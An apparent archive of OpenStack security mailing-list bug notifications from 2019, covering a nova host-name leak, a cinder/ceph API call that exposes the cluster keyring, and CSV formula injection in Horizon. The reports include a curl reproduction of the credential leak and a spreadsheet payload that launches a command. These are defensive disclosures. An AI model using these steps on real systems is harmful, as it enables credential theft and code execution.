OpenStack. https://bugs.launchpad.net/bugs/1851587 Title: HypervisorUnavailable error leaks compute host fqdn to non-admin users Status in OpenStack Compute (nova): New Status in OpenStack Security Advisory: Won't Fix Bug description: Description =========== When an instance encounters a HypervisorUnavailable error, the non-admin user gets the info of the compute host fqdn in the error message. Steps to reproduce ================== 1. Spin up an instance with non-admin user credentials 2. To reproduce the error, stop the libvirtd service on the compute host containing instance 3. Delete the instance 4. Deletion fails providing HypervisorUnavailable error Expected result =============== Error does not show compute host fqdn to a non-admin user Actual result ============= #spin up an instance +--------------------------------------+------------+--------+------------+-------------+-------------------------------------+------------------------------+--------------------------------------+-------------+-----------+-------------------+------+------------+ | ID | Name | Status | Task State | Power State | Networks | Image Name | Image ID | Flavor Name | Flavor ID | Availability Zone | Host | Properties | +--------------------------------------+------------+--------+------------+-------------+-------------------------------------+------------------------------+--------------------------------------+-------------+-----------+-------------------+------+------------+ | 4f42886d-e1f8-4607-a09d-0dc12a681880 | test-11869 | ACTIVE | None | Running | private=192.168.100.158, 10.0.0.243 | cirros-0.4.0-x86_64-disk.img | 5d0bd6a5-7331-4ebe-9328-d126189897e2 | | | nova | | | +--------------------------------------+------------+--------+------------+-------------+-------------------------------------+------------------------------+--------------------------------------+-------------+-----------+-------------------+------+------------+ #instance is running on compute-0 node (only admin knows this) [heat-admin at compute-0 ~]$ sudo virsh list --all Id Name State ---------------------------------------------------- 108 instance-00000092 running #stop libvirtd service [root at compute-0 heat-admin]# systemctl stop tripleo_nova_libvirt.service [root at compute-0 heat-admin]# systemctl status tripleo_nova_libvirt.service ● tripleo_nova_libvirt.service - nova_libvirt container Loaded: loaded (/etc/systemd/system/tripleo_nova_libvirt.service; enabled; vendor preset: disabled) Active: inactive (dead) since Wed 2019-11-06 22:48:25 UTC; 5s ago Process: 8514 ExecStop=/usr/bin/podman stop -t 10 nova_libvirt (code=exited, status=0/SUCCESS) Main PID: 3783 Nov 06 22:29:48 compute-0 podman[3396]: 2019-11-06 22:29:48.443603571 +0000 UTC m=+1.325620613 container init a3e32121d12929e663b899b57cb7bc87581ddf5bdfb19cf8fee4bace41cb19bb (image=undercloud-0.ctlpla> Nov 06 22:29:48 compute-0 podman[3396]: 2019-11-06 22:29:48.475946808 +0000 UTC m=+1.357963869 container start a3e32121d12929e663b899b57cb7bc87581ddf5bdfb19cf8fee4bace41cb19bb (image=undercloud-0.ctlpl> Nov 06 22:29:48 compute-0 paunch-start-podman-container[3385]: nova_libvirt Nov 06 22:29:48 compute-0 paunch-start-podman-container[3385]: Creating additional drop-in dependency for "nova_libvirt" (a3e32121d12929e663b899b57cb7bc87581ddf5bdfb19cf8fee4bace41cb19bb) Nov 06 22:29:49 compute-0 systemd[1]: Started nova_libvirt container. Nov 06 22:48:24 compute-0 systemd[1]: Stopping nova_libvirt container... Nov 06 22:48:25 compute-0 podman[8514]: 2019-11-06 22:48:25.595405651 +0000 UTC m=+1.063832024 container died a3e32121d12929e663b899b57cb7bc87581ddf5bdfb19cf8fee4bace41cb19bb (image=undercloud-0.ctlpla> Nov 06 22:48:25 compute-0 podman[8514]: 2019-11-06 22:48:25.597210594 +0000 UTC m=+1.065636903 container stop a3e32121d12929e663b899b57cb7bc87581ddf5bdfb19cf8fee4bace41cb19bb (image=undercloud-0.ctlpla> Nov 06 22:48:25 compute-0 podman[8514]: a3e32121d12929e663b899b57cb7bc87581ddf5bdfb19cf8fee4bace41cb19bb Nov 06 22:48:25 compute-0 systemd[1]: Stopped nova_libvirt container. #delete the instance, it leaks compute host fqdn to the non-admin user (overcloud) [stack at undercloud-0 ~]$ nova delete test-11869 Request to delete server test-11869 has been accepted. (overcloud) [stack at undercloud-0 ~]$ openstack server list --long +--------------------------------------+------------+--------+------------+-------------+----------+------------------------------+--------------------------------------+-------------+-----------+-------------------+------+------------+ | ID | Name | Status | Task State | Power State | Networks | Image Name | Image ID | Flavor Name | Flavor ID | Availability Zone | Host | Properties | +--------------------------------------+------------+--------+------------+-------------+----------+------------------------------+--------------------------------------+-------------+-----------+-------------------+------+------------+ | 4f42886d-e1f8-4607-a09d-0dc12a681880 | test-11869 | ERROR | None | Running | | cirros-0.4.0-x86_64-disk.img | 5d0bd6a5-7331-4ebe-9328-d126189897e2 | | | nova | | | +--------------------------------------+------------+--------+------------+-------------+----------+------------------------------+--------------------------------------+-------------+-----------+-------------------+------+------------+ (overcloud) [stack at undercloud-0 ~]$ openstack server show test-11869 <---debug output attached in logs +-----------------------------+---------------------------------------------------------------------------------------------------------------------------------------+ | Field | Value | +-----------------------------+---------------------------------------------------------------------------------------------------------------------------------------+ | OS-DCF:diskConfig | MANUAL | | OS-EXT-AZ:availability_zone | nova | | OS-EXT-STS:power_state | Running | | OS-EXT-STS:task_state | None | | OS-EXT-STS:vm_state | error | | OS-SRV-USG:launched_at | 2019-11-06T22:13:08.000000 | | OS-SRV-USG:terminated_at | None | | accessIPv4 | | | accessIPv6 | | | addresses | | | config_drive | | | created | 2019-11-06T22:12:57Z | | description | None | | fault | {'code': 500, 'created': '2019-11-06T23:01:45Z', 'message': 'Connection to the hypervisor is broken on host: compute-0.redhat.local'} | | flavor | disk='1', ephemeral='0', , original_name='m1.tiny', ram='512', swap='0', vcpus='1' | | hostId | c7e6bf58b57f435659bb0aa9637c7f830f776ec202a0d6e430ee3168 | | id | 4f42886d-e1f8-4607-a09d-0dc12a681880 | | image | cirros-0.4.0-x86_64-disk.img (5d0bd6a5-7331-4ebe-9328-d126189897e2) | | key_name | None | | locked | False | | locked_reason | None | | name | test-11869 | | project_id | 6e39619e17a9478580c93120e1cb16bc | | properties | | | server_groups | [] | | status | ERROR | | tags | [] | | trusted_image_certificates | None | | updated | 2019-11-06T23:01:45Z | | user_id | 3cd6a8cb88eb49d3a84f9e67d89df598 | | volumes_attached | | +-----------------------------+---------------------------------------------------------------------------------------------------------------------------------------+ To manage notifications about this bug go to: https://bugs.launchpad.net/nova/+bug/1851587/+subscriptions From 1851587 at bugs.launchpad.net Wed Nov 13 01:20:34 2019 From: 1851587 at bugs.launchpad.net (melanie witt) Date: Wed, 13 Nov 2019 01:20:34 -0000 Subject: [Openstack-security] [Bug 1851587] Re: HypervisorUnavailable error leaks compute host fqdn to non-admin users References: <157308280286.2833.4356246734465945672.malonedeb@gac.canonical.com> Message-ID: <157360803477.22813.14440925104285817040.malone@chaenomeles.canonical.com> > Do we need to get so granular that we need to set an attribute on each class of nova exception indicating if its fault message can be exposed to non-admins? That would be hard to maintain I imagine, but maybe it would just start with HypervisorUnavailable and we build on that for other known types of nova exceptions that leak host details? This sounds like the most reasonable idea to me, assuming we want/need to keep the compute host FQDN in the exception message. I had actually been thinking about the possibility of removing the FQDN from the exception message for HypervisorUnavailable altogether. If an admin sees HypervisorUnavailable, they can also easily see what host the guest is on (the instance 'host' field), and thus know what compute host has a broken connection. Just an idea. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1851587 Title: HypervisorUnavailable error leaks compute host fqdn to non-admin users Status in OpenStack Compute (nova): New Status in OpenStack Security Advisory: Won't Fix Bug description: Description =========== When an instance encounters a HypervisorUnavailable error, the non-admin user gets the info of the compute host fqdn in the error message. Steps to reproduce ================== 1. Spin up an instance with non-admin user credentials 2. To reproduce the error, stop the libvirtd service on the compute host containing instance 3. Delete the instance 4. Deletion fails providing HypervisorUnavailable error Expected result =============== Error does not show compute host fqdn to a non-admin user Actual result ============= #spin up an instance +--------------------------------------+------------+--------+------------+-------------+-------------------------------------+------------------------------+--------------------------------------+-------------+-----------+-------------------+------+------------+ | ID | Name | Status | Task State | Power State | Networks | Image Name | Image ID | Flavor Name | Flavor ID | Availability Zone | Host | Properties | +--------------------------------------+------------+--------+------------+-------------+-------------------------------------+------------------------------+--------------------------------------+-------------+-----------+-------------------+------+------------+ | 4f42886d-e1f8-4607-a09d-0dc12a681880 | test-11869 | ACTIVE | None | Running | private=192.168.100.158, 10.0.0.243 | cirros-0.4.0-x86_64-disk.img | 5d0bd6a5-7331-4ebe-9328-d126189897e2 | | | nova | | | +--------------------------------------+------------+--------+------------+-------------+-------------------------------------+------------------------------+--------------------------------------+-------------+-----------+-------------------+------+------------+ #instance is running on compute-0 node (only admin knows this) [heat-admin at compute-0 ~]$ sudo virsh list --all Id Name State ---------------------------------------------------- 108 instance-00000092 running #stop libvirtd service [root at compute-0 heat-admin]# systemctl stop tripleo_nova_libvirt.service [root at compute-0 heat-admin]# systemctl status tripleo_nova_libvirt.service ● tripleo_nova_libvirt.service - nova_libvirt container Loaded: loaded (/etc/systemd/system/tripleo_nova_libvirt.service; enabled; vendor preset: disabled) Active: inactive (dead) since Wed 2019-11-06 22:48:25 UTC; 5s ago Process: 8514 ExecStop=/usr/bin/podman stop -t 10 nova_libvirt (code=exited, status=0/SUCCESS) Main PID: 3783 Nov 06 22:29:48 compute-0 podman[3396]: 2019-11-06 22:29:48.443603571 +0000 UTC m=+1.325620613 container init a3e32121d12929e663b899b57cb7bc87581ddf5bdfb19cf8fee4bace41cb19bb (image=undercloud-0.ctlpla> Nov 06 22:29:48 compute-0 podman[3396]: 2019-11-06 22:29:48.475946808 +0000 UTC m=+1.357963869 container start a3e32121d12929e663b899b57cb7bc87581ddf5bdfb19cf8fee4bace41cb19bb (image=undercloud-0.ctlpl> Nov 06 22:29:48 compute-0 paunch-start-podman-container[3385]: nova_libvirt Nov 06 22:29:48 compute-0 paunch-start-podman-container[3385]: Creating additional drop-in dependency for "nova_libvirt" (a3e32121d12929e663b899b57cb7bc87581ddf5bdfb19cf8fee4bace41cb19bb) Nov 06 22:29:49 compute-0 systemd[1]: Started nova_libvirt container. Nov 06 22:48:24 compute-0 systemd[1]: Stopping nova_libvirt container... Nov 06 22:48:25 compute-0 podman[8514]: 2019-11-06 22:48:25.595405651 +0000 UTC m=+1.063832024 container died a3e32121d12929e663b899b57cb7bc87581ddf5bdfb19cf8fee4bace41cb19bb (image=undercloud-0.ctlpla> Nov 06 22:48:25 compute-0 podman[8514]: 2019-11-06 22:48:25.597210594 +0000 UTC m=+1.065636903 container stop a3e32121d12929e663b899b57cb7bc87581ddf5bdfb19cf8fee4bace41cb19bb (image=undercloud-0.ctlpla> Nov 06 22:48:25 compute-0 podman[8514]: a3e32121d12929e663b899b57cb7bc87581ddf5bdfb19cf8fee4bace41cb19bb Nov 06 22:48:25 compute-0 systemd[1]: Stopped nova_libvirt container. #delete the instance, it leaks compute host fqdn to the non-admin user (overcloud) [stack at undercloud-0 ~]$ nova delete test-11869 Request to delete server test-11869 has been accepted. (overcloud) [stack at undercloud-0 ~]$ openstack server list --long +--------------------------------------+------------+--------+------------+-------------+----------+------------------------------+--------------------------------------+-------------+-----------+-------------------+------+------------+ | ID | Name | Status | Task State | Power State | Networks | Image Name | Image ID | Flavor Name | Flavor ID | Availability Zone | Host | Properties | +--------------------------------------+------------+--------+------------+-------------+----------+------------------------------+--------------------------------------+-------------+-----------+-------------------+------+------------+ | 4f42886d-e1f8-4607-a09d-0dc12a681880 | test-11869 | ERROR | None | Running | | cirros-0.4.0-x86_64-disk.img | 5d0bd6a5-7331-4ebe-9328-d126189897e2 | | | nova | | | +--------------------------------------+------------+--------+------------+-------------+----------+------------------------------+--------------------------------------+-------------+-----------+-------------------+------+------------+ (overcloud) [stack at undercloud-0 ~]$ openstack server show test-11869 <---debug output attached in logs +-----------------------------+---------------------------------------------------------------------------------------------------------------------------------------+ | Field | Value | +-----------------------------+---------------------------------------------------------------------------------------------------------------------------------------+ | OS-DCF:diskConfig | MANUAL | | OS-EXT-AZ:availability_zone | nova | | OS-EXT-STS:power_state | Running | | OS-EXT-STS:task_state | None | | OS-EXT-STS:vm_state | error | | OS-SRV-USG:launched_at | 2019-11-06T22:13:08.000000 | | OS-SRV-USG:terminated_at | None | | accessIPv4 | | | accessIPv6 | | | addresses | | | config_drive | | | created | 2019-11-06T22:12:57Z | | description | None | | fault | {'code': 500, 'created': '2019-11-06T23:01:45Z', 'message': 'Connection to the hypervisor is broken on host: compute-0.redhat.local'} | | flavor | disk='1', ephemeral='0', , original_name='m1.tiny', ram='512', swap='0', vcpus='1' | | hostId | c7e6bf58b57f435659bb0aa9637c7f830f776ec202a0d6e430ee3168 | | id | 4f42886d-e1f8-4607-a09d-0dc12a681880 | | image | cirros-0.4.0-x86_64-disk.img (5d0bd6a5-7331-4ebe-9328-d126189897e2) | | key_name | None | | locked | False | | locked_reason | None | | name | test-11869 | | project_id | 6e39619e17a9478580c93120e1cb16bc | | properties | | | server_groups | [] | | status | ERROR | | tags | [] | | trusted_image_certificates | None | | updated | 2019-11-06T23:01:45Z | | user_id | 3cd6a8cb88eb49d3a84f9e67d89df598 | | volumes_attached | | +-----------------------------+---------------------------------------------------------------------------------------------------------------------------------------+ To manage notifications about this bug go to: https://bugs.launchpad.net/nova/+bug/1851587/+subscriptions From rosmaita.fossdev at gmail.com Wed Nov 20 21:27:27 2019 From: rosmaita.fossdev at gmail.com (Brian Rosmaita) Date: Wed, 20 Nov 2019 21:27:27 -0000 Subject: [Openstack-security] [Bug 1849624] Re: ceph backend, secret key leak References: <157190672936.29164.18418741485624946377.malonedeb@soybean.canonical.com> Message-ID: <157428525288.21411.15186668012809947570.launchpad@soybean.canonical.com> ** Changed in: ossn Status: In Progress => Fix Released ** Changed in: cinder Status: In Progress => Fix Committed -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1849624 Title: ceph backend, secret key leak Status in Cinder: Fix Committed Status in OpenStack Security Advisory: Won't Fix Status in OpenStack Security Notes: Fix Released Bug description: Cinder + ceph backend, secret key leak Conditions: cinder + ceph backend + rbd_keyring_conf set in cinder config files As an authenticated simple user create a cinder volume that ends up on a ceph backend, Then reuse the os.initialize_connection api call (used by nova-compute/cinder-backup to attach volumes locally to the host running the services): curl -g -i -X POST https:///v3/c495530af57611e9bc14bbaa251e1e96/volumes/7e59b91e-d426-4294-bfc5-dfdebcb21879/action \     -H "Accept: application/json" \     -H "Content-Type: application/json" \     -H "OpenStack-API-Version: volume 3.15" \     -H "X-Auth-Token: $TOKEN" \     -d '{"os-initialize_connection": {"connector":{}}}' If you do not want to forge the http request, openstack clients and extensions may prove helpful. As root: apt-get install python3-oslo.privsep virtualenv python3-dev python3-os-brick gcc ceph-common virtualenv -p python3 venv_openstack source venv_openstack/bin/activate pip install python-openstackclient pip install python-cinderclient pip install os-brick pip install python-brick-cinderclient-ext cinder create vol 1 cinder --debug local-attach 7e59b91e-d426-4294-bfc5-dfdebcb21879 This leaks the ceph credentials for the whole ceph cluster, leaving anyone able to go through ceph acls to get access to all the volumes within the cluster. {    "connection_info" : {       "data" : {          "access_mode" : "rw",          "secret_uuid" : "SECRET_UUID",          "cluster_name" : "ceph",          "encrypted" : false,          "auth_enabled" : true,          "discard" : true,          "qos_specs" : {             "write_iops_sec" : "3050",             "read_iops_sec" : "3050"          },          "keyring" : "SECRETFILETOHIDE",          "ports" : [             "6789",             "6789",             "6789"          ],          "name" : "volumes/volume-7e59b91e-d426-4294-bfc5-dfdebcb21879",          "secret_type" : "ceph",          "hosts" : [             "ceph_host1",             "ceph_host2",             ...          ],          "volume_id" : "7e59b91e-d426-4294-bfc5-dfdebcb21879",          "auth_username" : "cinder"       },       "driver_volume_type" : "rbd"    } } Quick workaround: 1. Remove rbd_keyring_conf param from any cinder config file, this will mitigate the information disclosure. 2. For cinder backups to still work, providers should instead deploy their ceph keyring secrets directly on cinder-backup hosts (/etc/cinder/.keyring.conf, to be confirmed). Note that nova-compute hosts should not be impacted by the change, because ceph secrets are expected to be stored in libvirt secrets already, thus making this keyring disclose useless to it. (to be confirmed, there may be other compute drivers that might be impacted by this) Quick code fix: Mandatory: revert this commit https://review.opendev.org/#/c/456672/ Optional: revert this one https://review.opendev.org/#/c/465044/, harmless in itself, but pointless once the first one has been reverted Long term code fix proposals: What the os.initialize_connection api call is meant to: allow simple users to use cinder as block storage as a service in order to attach volumes outside the scope of any virtual machines/nova. Thus, information returned by this call should give enough information for a volume attach to be possible for the caller but they should not disclose anything that would allow him to do more than that. Since it is not possible at all with ceph to do so (no tenant isolation within ceph cluster), the related cinder backend for ceph should not implement this route at all There is indeed no reason why cinder should disclose anything here about ceph cluster, including hosts, cluster-ids, if the attach is doomed to fail for users missing secret informations anyway. Then, any 'admin' service using this call to locally attach the volumes (nova-compute, cinder-backup...) should be modified to: - check caller rw permissions on requested volumes - escalate the request - go through a new admin api route, not this 'user' one To manage notifications about this bug go to: https://bugs.launchpad.net/cinder/+bug/1849624/+subscriptions From 1842749 at bugs.launchpad.net Thu Nov 21 10:24:49 2019 From: 1842749 at bugs.launchpad.net (OpenStack Infra) Date: Thu, 21 Nov 2019 10:24:49 -0000 Subject: [Openstack-security] [Bug 1842749] Fix included in openstack/horizon 17.0.0 References: <156762575246.17155.15736064918343185075.malonedeb@gac.canonical.com> Message-ID: <157433188938.31140.4842427477593320506.malone@wampee.canonical.com> This issue was fixed in the openstack/horizon 17.0.0 release. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1842749 Title: CSV Injection Possible in Compute Usage History Status in OpenStack Dashboard (Horizon): Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: Many spreadsheet programs, such as Excel, LibreOffice, and OpenOffice, will parse and treat cells with special metacharacters as formulas. These programs can open comma-separated values (CSV) files and treat them as spreadsheets. If an attacker can influence the contents of CSV file, then that can allow the attacker to inject code that will execute when someone opens the CSV file through a spreadsheet program. In the Compute Overview panel in Horizon, there is a section titled “Usage Summary.” This section has a feature for downloading a CSV document of that usage summary. The contents of the CSV document include the name of the instances and other points of data such as its current state or how many resources it consumes. An attacker could create an instance with a malicious name beginning with an equals sign (=) or at sign (‘@’). These are both recognized in Excel as metacharacters for a formula. The attacker can create an instance name that includes a payload that will execute code such as: =cmd|' /C calc'!A0 This payload opens the calculator program when the resulting CSV is opened on a Windows machine with Microsoft Excel. An attacker could easily substitute this payload with another that runs any arbitrary shell commands. Reproduction Steps: 1. Access an OpenStack project, navigate to the Instances section. 2. Create an instance with the following name: =cmd|' /C calc'!A0 3. Navigate to the Overview section. 4. Refresh the page until the new instance shows up in the Usage list. 5. Click the button titled “DOWNLOAD CSV SUMMARY.” 6. Observe the generated CSV file. To manage notifications about this bug go to: https://bugs.launchpad.net/horizon/+bug/1842749/+subscriptions From rosmaita.fossdev at gmail.com Thu Nov 21 13:31:11 2019 From: rosmaita.fossdev at gmail.com (Brian Rosmaita) Date: Thu, 21 Nov 2019 13:31:11 -0000 Subject: [Openstack-security] [Bug 1849624] Re: ceph backend, secret key leak References: <157190672936.29164.18418741485624946377.malonedeb@soybean.canonical.com> Message-ID: <157434307253.6262.6108347867955584940.malone@gac.canonical.com> This actually hasn't merged yet. It's been approved but has been stuck in the gate due to circumstances beyond Cinder's control. ** Changed in: cinder Status: Fix Committed => In Progress -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1849624 Title: ceph backend, secret key leak Status in Cinder: In Progress Status in OpenStack Security Advisory: Won't Fix Status in OpenStack Security Notes: Fix Released Bug description: Cinder + ceph backend, secret key leak Conditions: cinder + ceph backend + rbd_keyring_conf set in cinder config files As an authenticated simple user create a cinder volume that ends up on a ceph backend, Then reuse the os.initialize_connection api call (used by nova-compute/cinder-backup to attach volumes locally to the host running the services): curl -g -i -X POST https:///v3/c495530af57611e9bc14bbaa251e1e96/volumes/7e59b91e-d426-4294-bfc5-dfdebcb21879/action \     -H "Accept: application/json" \     -H "Content-Type: application/json" \     -H "OpenStack-API-Version: volume 3.15" \     -H "X-Auth-Token: $TOKEN" \     -d '{"os-initialize_connection": {"connector":{}}}' If you do not want to forge the http request, openstack clients and extensions may prove helpful. As root: apt-get install python3-oslo.privsep virtualenv python3-dev python3-os-brick gcc ceph-common virtualenv -p python3 venv_openstack source venv_openstack/bin/activate pip install python-openstackclient pip install python-cinderclient pip install os-brick pip install python-brick-cinderclient-ext cinder create vol 1 cinder --debug local-attach 7e59b91e-d426-4294-bfc5-dfdebcb21879 This leaks the ceph credentials for the whole ceph cluster, leaving anyone able to go through ceph acls to get access to all the volumes within the cluster. {    "connection_info" : {       "data" : {          "access_mode" : "rw",          "secret_uuid" : "SECRET_UUID",          "cluster_name" : "ceph",          "encrypted" : false,          "auth_enabled" : true,          "discard" : true,          "qos_specs" : {             "write_iops_sec" : "3050",             "read_iops_sec" : "3050"          },          "keyring" : "SECRETFILETOHIDE",          "ports" : [             "6789",             "6789",             "6789"          ],          "name" : "volumes/volume-7e59b91e-d426-4294-bfc5-dfdebcb21879",          "secret_type" : "ceph",          "hosts" : [             "ceph_host1",             "ceph_host2",             ...          ],          "volume_id" : "7e59b91e-d426-4294-bfc5-dfdebcb21879",          "auth_username" : "cinder"       },       "driver_volume_type" : "rbd"    } } Quick workaround: 1. Remove rbd_keyring_conf param from any cinder config file, this will mitigate the information disclosure. 2. For cinder backups to still work, providers should instead deploy their ceph keyring secrets directly on cinder-backup hosts (/etc/cinder/.keyring.conf, to be confirmed). Note that nova-compute hosts should not be impacted by the change, because ceph secrets are expected to be stored in libvirt secrets already, thus making this keyring disclose useless to it. (to be confirmed, there may be other compute drivers that might be impacted by this) Quick code fix: Mandatory: revert this commit https://review.opendev.org/#/c/456672/ Optional: revert this one https://review.opendev.org/#/c/465044/, harmless in itself, but pointless once the first one has been reverted Long term code fix proposals: What the os.initialize_connection api call is meant to: allow simple users to use cinder as block storage as a service in order to attach volumes outside the scope of any virtual machines/nova. Thus, information returned by this call should give enough information for a volume attach to be possible for the caller but they should not disclose anything that would allow him to do more than that. Since it is not possible at all with ceph to do so (no tenant isolation within ceph cluster), the related cinder backend for ceph should not implement this route at all There is indeed no reason why cinder should disclose anything here about ceph cluster, including hosts, cluster-ids, if the attach is doomed to fail for users missing secret informations anyway. Then, any 'admin' service using this call to locally attach the volumes (nova-compute, cinder-backup...) should be modified to: - check caller rw permissions on requested volumes - escalate the request - go through a new admin api route, not this 'user' one To manage notifications about this bug go to: https://bugs.launchpad.net/cinder/+bug/1849624/+subscriptions From 1849624 at bugs.launchpad.net Thu Nov 21 18:32:10 2019 From: 1849624 at bugs.launchpad.net (OpenStack Infra) Date: Thu, 21 Nov 2019 18:32:10 -0000 Subject: [Openstack-security] [Bug 1849624] Fix merged to cinder (master) References: <157190672936.29164.18418741485624946377.malonedeb@soybean.canonical.com> Message-ID: <157436113043.31496.4634121766406087333.malone@wampee.canonical.com> Reviewed: https://review.opendev.org/692428 Committed: https://git.openstack.org/cgit/openstack/cinder/commit/?id=b3c68b777a53e78fb77b7af98952bcc7d97bb06f Submitter: Zuul Branch: master commit b3c68b777a53e78fb77b7af98952bcc7d97bb06f Author: Brian Rosmaita Date: Thu Oct 31 14:17:19 2019 -0400 Deprecate rbd_keyring_conf option This option presents a security risk; see OSSN-0085. Change-Id: I345a3b4bf3b328b0e547016f481518d252f734b9 Partial-bug: #1849624 -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1849624 Title: ceph backend, secret key leak Status in Cinder: In Progress Status in OpenStack Security Advisory: Won't Fix Status in OpenStack Security Notes: Fix Released Bug description: Cinder + ceph backend, secret key leak Conditions: cinder + ceph backend + rbd_keyring_conf set in cinder config files As an authenticated simple user create a cinder volume that ends up on a ceph backend, Then reuse the os.initialize_connection api call (used by nova-compute/cinder-backup to attach volumes locally to the host running the services): curl -g -i -X POST https:///v3/c495530af57611e9bc14bbaa251e1e96/volumes/7e59b91e-d426-4294-bfc5-dfdebcb21879/action \     -H "Accept: application/json" \     -H "Content-Type: application/json" \     -H "OpenStack-API-Version: volume 3.15" \     -H "X-Auth-Token: $TOKEN" \     -d '{"os-initialize_connection": {"connector":{}}}' If you do not want to forge the http request, openstack clients and extensions may prove helpful. As root: apt-get install python3-oslo.privsep virtualenv python3-dev python3-os-brick gcc ceph-common virtualenv -p python3 venv_openstack source venv_openstack/bin/activate pip install python-openstackclient pip install python-cinderclient pip install os-brick pip install python-brick-cinderclient-ext cinder create vol 1 cinder --debug local-attach 7e59b91e-d426-4294-bfc5-dfdebcb21879 This leaks the ceph credentials for the whole ceph cluster, leaving anyone able to go through ceph acls to get access to all the volumes within the cluster. {    "connection_info" : {       "data" : {          "access_mode" : "rw",          "secret_uuid" : "SECRET_UUID",          "cluster_name" : "ceph",          "encrypted" : false,          "auth_enabled" : true,          "discard" : true,          "qos_specs" : {             "write_iops_sec" : "3050",             "read_iops_sec" : "3050"          },          "keyring" : "SECRETFILETOHIDE",          "ports" : [             "6789",             "6789",             "6789"          ],          "name" : "volumes/volume-7e59b91e-d426-4294-bfc5-dfdebcb21879",          "secret_type" : "ceph",          "hosts" : [             "ceph_host1",             "ceph_host2",             ...          ],          "volume_id" : "7e59b91e-d426-4294-bfc5-dfdebcb21879",          "auth_username" : "cinder"       },       "driver_volume_type" : "rbd"    } } Quick workaround: 1. Remove rbd_keyring_conf param from any cinder config file, this will mitigate the information disclosure. 2. For cinder backups to still work, providers should instead deploy their ceph keyring secrets directly on cinder-backup hosts (/etc/cinder/.keyring.conf, to be confirmed). Note that nova-compute hosts should not be impacted by the change, because ceph secrets are expected to be stored in libvirt secrets already, thus making this keyring disclose useless to it. (to be confirmed, there may be other compute drivers that might be impacted by this) Quick code fix: Mandatory: revert this commit https://review.opendev.org/#/c/456672/ Optional: revert this one https://review.opendev.org/#/c/465044/, harmless in itself, but pointless once the first one has been reverted Long term code fix proposals: What the os.initialize_connection api call is meant to: allow simple users to use cinder as block storage as a service in order to attach volumes outside the scope of any virtual machines/nova. Thus, information returned by this call should give enough information for a volume attach to be possible for the caller but they should not disclose anything that would allow him to do more than that. Since it is not possible at all with ceph to do so (no tenant isolation within ceph cluster), the related cinder backend for ceph should not implement this route at all There is indeed no reason why cinder should disclose anything here about ceph cluster, including hosts, cluster-ids, if the attach is doomed to fail for users missing secret informations anyway. Then, any 'admin' service using this call to locally attach the volumes (nova-compute, cinder-backup...) should be modified to: - check caller rw permissions on requested volumes - escalate the request - go through a new admin api route, not this 'user' one To manage notifications about this bug go to: https://bugs.launchpad.net/cinder/+bug/1849624/+subscriptions From rosmaita.fossdev at gmail.com Thu Nov 21 19:25:17 2019 From: rosmaita.fossdev at gmail.com (Brian Rosmaita) Date: Thu, 21 Nov 2019 19:25:17 -0000 Subject: [Openstack-security] [Bug 1849624] Re: ceph backend, secret key leak References: <157190672936.29164.18418741485624946377.malonedeb@soybean.canonical.com> Message-ID: <157436431951.7162.5919083330767320950.launchpad@gac.canonical.com> ** Changed in: cinder Status: In Progress => Fix Committed -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1849624 Title: ceph backend, secret key leak Status in Cinder: Fix Committed Status in OpenStack Security Advisory: Won't Fix Status in OpenStack Security Notes: Fix Released Bug description: Cinder + ceph backend, secret key leak Conditions: cinder + ceph backend + rbd_keyring_conf set in cinder config files As an authenticated simple user create a cinder volume that ends up on a ceph backend, Then reuse the os.initialize_connection api call (used by nova-compute/cinder-backup to attach volumes locally to the host running the services): curl -g -i -X POST https:///v3/c495530af57611e9bc14bbaa251e1e96/volumes/7e59b91e-d426-4294-bfc5-dfdebcb21879/action \     -H "Accept: application/json" \     -H "Content-Type: application/json" \     -H "OpenStack-API-Version: volume 3.15" \     -H "X-Auth-Token: $TOKEN" \     -d '{"os-initialize_connection": {"connector":{}}}' If you do not want to forge the http request, openstack clients and extensions may prove helpful. As root: apt-get install python3-oslo.privsep virtualenv python3-dev python3-os-brick gcc ceph-common virtualenv -p python3 venv_openstack source venv_openstack/bin/activate pip install python-openstackclient pip install python-cinderclient pip install os-brick pip install python-brick-cinderclient-ext cinder create vol 1 cinder --debug local-attach 7e59b91e-d426-4294-bfc5-dfdebcb21879 This leaks the ceph credentials for the whole ceph cluster, leaving anyone able to go through ceph acls to get access to all the volumes within the cluster. {    "connection_info" : {       "data" : {          "access_mode" : "rw",          "secret_uuid" : "SECRET_UUID",          "cluster_name" : "ceph",          "encrypted" : false,          "auth_enabled" : true,          "discard" : true,          "qos_specs" : {             "write_iops_sec" : "3050",             "read_iops_sec" : "3050"          },          "keyring" : "SECRETFILETOHIDE",          "ports" : [             "6789",             "6789",             "6789"          ],          "name" : "volumes/volume-7e59b91e-d426-4294-bfc5-dfdebcb21879",          "secret_type" : "ceph",          "hosts" : [             "ceph_host1",             "ceph_host2",             ...          ],          "volume_id" : "7e59b91e-d426-4294-bfc5-dfdebcb21879",          "auth_username" : "cinder"       },       "driver_volume_type" : "rbd"    } } Quick workaround: 1. Remove rbd_keyring_conf param from any cinder config file, this will mitigate the information disclosure. 2. For cinder backups to still work, providers should instead deploy their ceph keyring secrets directly on cinder-backup hosts (/etc/cinder/.keyring.conf, to be confirmed). Note that nova-compute hosts should not be impacted by the change, because ceph secrets are expected to be stored in libvirt secrets already, thus making this keyring disclose useless to it. (to be confirmed, there may be other compute drivers that might be impacted by this) Quick code fix: Mandatory: revert this commit https://review.opendev.org/#/c/456672/ Optional: revert this one https://review.opendev.org/#/c/465044/, harmless in itself, but pointless once the first one has been reverted Long term code fix proposals: What the os.initialize_connection api call is meant to: allow simple users to use cinder as block storage as a service in order to attach volumes outside the scope of any virtual machines/nova. Thus, information returned by this call should give enough information for a volume attach to be possible for the caller but they should not disclose anything that would allow him to do more than that. Since it is not possible at all with ceph to do so (no tenant isolation within ceph cluster), the related cinder backend for ceph should not implement this route at all There is indeed no reason why cinder should disclose anything here about ceph cluster, including hosts, cluster-ids, if the attach is doomed to fail for users missing secret informations anyway. Then, any 